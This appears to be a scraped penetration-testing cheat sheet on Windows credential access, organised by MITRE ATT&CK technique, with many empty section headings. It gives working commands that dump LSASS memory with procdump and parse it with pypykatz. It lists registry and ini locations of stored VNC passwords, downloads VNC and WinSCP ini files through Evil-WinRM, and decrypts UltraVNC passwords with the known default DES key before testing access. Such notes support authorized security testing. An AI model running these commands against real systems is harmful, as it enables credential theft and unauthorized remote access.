Skip to main content Link Menu Expand (external link) Document Search Copy Copied

pen / win / creds

Mitre Att&ck Entreprise: TA0006 - Credentials Access

Menu

tools

Multi-features Hacking Tools :

repolast updatestarswatchlanguage

dumps

lsass

lsass-dump

procdump.exe -accepteula -ma lsass.exe lsass.dmp

lsass-extract

pypykatz lsa minidump lsass.dmp -k /tmp/krb > output.txt

ntds-dit

ntds-dit-dump

sam

regkeys

T1552.002

Software\SimonTatham\Putty\Sessions

schtasks

softwares

auto

repolast updatestarswatchlanguage

chrome

mremoteng

xvnc

  • VNC softwares properties:
softwareregistry keyini file
RealVNCHKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserverC:\Program Files\RealVNC\
TightVNCHKEY_CURRENT_USER\Software\TightVNC\ServerC:\Program Files\TightVNC\
TigerVNCHKEY_LOCAL_USER\Software\TigerVNC\WinVNC4C:\Program Files\TigerVNC\
UltraVNC C:\Program Files\uvnc bvba\UltraVNC\ultravnc.ini
  • Example of download of the ini file:
    Evil-winRM > download "C:\Program Files\uvnc bvba\UltraVNC\ultravnc.ini" /tmp/ultravnc.ini
    
  • UtltraVNC specificities

passwd - full control password passwd2 - read-only password

# des decryption using the ultravnc default decryption key 'e84ad660c4721ae0' 
echo -n passwd | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d -provider legacy -provider default | hexdump -Cv

# test the password / vnc access
vncsnapshot 1.2.3.4 pwned_desktop_x.png

winscp

  • Get an RDP session
  • Check if there are saved passwords
  • Export the configuration
  • Download of the ini file:
    Evil-winRM > download "C:\Windows\Temp\winscp.ini" /tmp/winscp.ini
    

    reverse-pwd

putty

browsers

sources